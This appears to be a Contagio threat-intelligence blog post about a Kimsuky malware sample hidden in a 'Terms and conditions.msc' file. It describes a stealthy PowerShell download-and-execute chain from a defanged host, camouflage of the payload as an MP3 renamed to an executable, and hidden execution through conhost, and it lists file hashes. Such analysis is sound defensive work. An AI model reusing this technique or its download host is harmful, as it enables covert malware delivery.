2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjan - Terms and Conditions.msc)
2024-09-10 Sakai @sakaijjang 김수키(Kimsuky) 에서 만든 악성코드-Terms and conditions(이용 약관).msc(2024.9.6) - Kimsuky (North Korea) - Terms and Conditions.msc
by https://x.com/sakaijjang?lang=en
Article translation in English
More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus
- The malware is delivered as a file named "Terms and conditions.msc," containing embedded PowerShell commands.
- The PowerShell script is executed in a hidden window (-WindowStyle Hidden), preventing user awareness.
- The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a malicious script from hxxps://0x0(.)st/Xyl7(.)txt.
- The downloaded data, encoded in hexadecimal, is decoded into a byte array.
- The decoded data is initially saved as an MP3 file (e.g., vBqz.mp3) in the system’s public documents folder.
- The MP3 file is then renamed to an executable file (e.g., vBqz.exe), disguising the payload as a media file.
- The executable is run using conhost.exe in the background with the -NoNewWindow option, ensuring it remains hidden.
- File Camouflage: The use of the MP3 extension initially disguises the executable file.
- Stealthy Execution: Utilizing system utilities like conhost.exe and executing commands in hidden windows help evade user detection and security software.
- Command-and-Control (C2) Infrastructure: The malware’s reliance on a public site for payload distribution suggests a flexible and easily reconfigurable C2 mechanism.
- Hexadecimal Encoding: The use of encoded data indicates potential obfuscation techniques; decoding this data can reveal more about the malware.
- Potential Variants: Different versions of this malware may exist, with variations in the payload or C2 URLs. Monitoring and updating detection rules, such as YARA, would be beneficial.
File Information
Name: Terms and conditions.msc
Size: 141 KB
MD5: 81d224649328a61c899be9403d1de92d
SHA-1: f4895809cb38fa1f225340e99c05e477a5017111
SHA-256: cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09
- Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.